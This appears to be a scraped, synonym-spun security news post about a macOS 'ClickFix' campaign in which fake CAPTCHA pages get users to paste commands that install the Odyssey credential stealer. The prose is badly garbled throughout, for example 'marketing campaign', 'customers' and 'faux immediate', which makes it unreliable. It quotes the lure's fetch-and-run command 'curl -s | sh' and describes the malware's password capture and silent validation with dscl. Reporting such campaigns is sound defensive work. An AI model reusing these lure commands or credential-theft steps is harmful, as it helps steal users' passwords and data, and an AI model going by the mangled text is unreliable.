Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Threat Actors Employ Clickfix Tactics to Deliver Malicious AppleScripts That Steal Login Credentials

Posted on June 27, 2025June 27, 2025 By CWS

A classy new malware marketing campaign focusing on macOS customers has emerged, using misleading “Clickfix” ways to distribute malicious AppleScripts designed to reap delicate consumer credentials and monetary information.

The marketing campaign leverages typosquatted domains that intently mimic authentic finance platforms and Apple App Retailer web sites, making a convincing facade that tips customers into executing harmful instructions on their programs.

The assault begins when customers inadvertently go to malicious domains that current faux Cloudflare-style CAPTCHA prompts.

These seemingly authentic verification pages instruct macOS customers to repeat and paste Base64-encoded instructions into their terminal functions to show they don’t seem to be robots.

As soon as executed, these instructions provoke a complete information theft operation that targets browser credentials, cryptocurrency wallets, and delicate private data saved throughout a number of functions.

Cyfirma researchers recognized this malware because the Odyssey Stealer, a rebranded model of the beforehand identified Poseidon Stealer that itself originated as a fork of the AMOS Stealer.

The analysis crew uncovered a number of command-and-control panels linked to this exercise, with infrastructure primarily hosted in Russia.

The malware demonstrates a transparent choice for focusing on customers in Western nations, notably the USA and European Union, whereas conspicuously avoiding victims in Commonwealth of Unbiased States nations.

The Odyssey Stealer represents a regarding evolution in macOS-targeting malware, combining social engineering ways with subtle technical capabilities.

Not like conventional malware that depends on software program vulnerabilities, this marketing campaign exploits human psychology by presenting customers with familiar-looking safety prompts that seem like routine verification procedures.

The attackers have rigorously crafted their distribution web sites to reflect trusted platforms, making detection notably difficult for unsuspecting customers.

An infection Mechanism and Payload Execution

The malware’s an infection mechanism depends on a multi-stage course of that begins with area typosquatting and culminates in complete system compromise.

ClickFix distribution move (Supply – Cyfirma)

When customers go to the malicious domains, they encounter professionally designed pages that replicate the looks of authentic CAPTCHA verification programs.

The faux immediate shows directions for macOS customers to execute a command that seems as follows:-

curl -s | sh

This command retrieves and executes an AppleScript from the attacker’s command-and-control server. The script employs alphanumeric obfuscation to cover perform names, although evaluation reveals its true goal.

Upon execution, the malware creates a short lived listing construction utilizing the mkdir command, particularly establishing /tmp/lovemrtrump as its operational base.

The AppleScript then shows a convincing authentication immediate designed to seize the consumer’s system password.

To validate stolen credentials silently, it leverages the macOS dscl command with the authonly parameter, guaranteeing the verification course of stays hidden from the consumer.

This method permits the malware to verify password validity with out triggering system alerts or consumer suspicion, demonstrating the attackers’ deep understanding of macOS safety mechanisms.

Examine reside malware conduct, hint each step of an assault, and make quicker, smarter safety choices -> Attempt ANY.RUN now

Cyber Security News Tags:Actors, AppleScripts, ClickFix, Credentials, Deliver, Employ, Login, Malicious, Steal, Tactics, Threat

Post navigation

Previous Post: RevEng.ai Raises $4.15 Million to Secure Software Supply Chain
Next Post: Chinese Group Silver Fox Uses Fake Websites to Deliver Sainbox RAT and Hidden Rootkit

Related Posts

Multiple Apache Tomcat Vulnerabilities Let Attackers Trigger DoS Attacks Cyber Security News
US Sanction Key Threat Actors Linked With North Korea’s Remote IT Worker Scheme Cyber Security News
Microsoft Exchange Server Vulnerabilities Let Attackers Spoof and Tamper Over Network Cyber Security News
Network Intrusion Detection for Emerging 2025 Cyber Threats Cyber Security News
PyPI Released Advisory to Prevent ZIP Parser Confusion Attacks on Python Package Installers Cyber Security News
INE Security Partners with Abadnet Institute for Cybersecurity Training Programs in Saudi Arabia Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • How to Stay Anonymous Online
  • DOM-Based Extension Clickjacking Exposes Popular Password Managers to Credential and Data Theft
  • Hackers Weaponize Active Directory Federation Services and office.com to Steal Microsoft 365 logins
  • A Free Zero Trust Web Application Firewall for 2026
  • FBI Warns FSB-Linked Hackers Exploiting Unpatched Cisco Devices for Cyber Espionage

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • How to Stay Anonymous Online
  • DOM-Based Extension Clickjacking Exposes Popular Password Managers to Credential and Data Theft
  • Hackers Weaponize Active Directory Federation Services and office.com to Steal Microsoft 365 logins
  • A Free Zero Trust Web Application Firewall for 2026
  • FBI Warns FSB-Linked Hackers Exploiting Unpatched Cisco Devices for Cyber Espionage

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News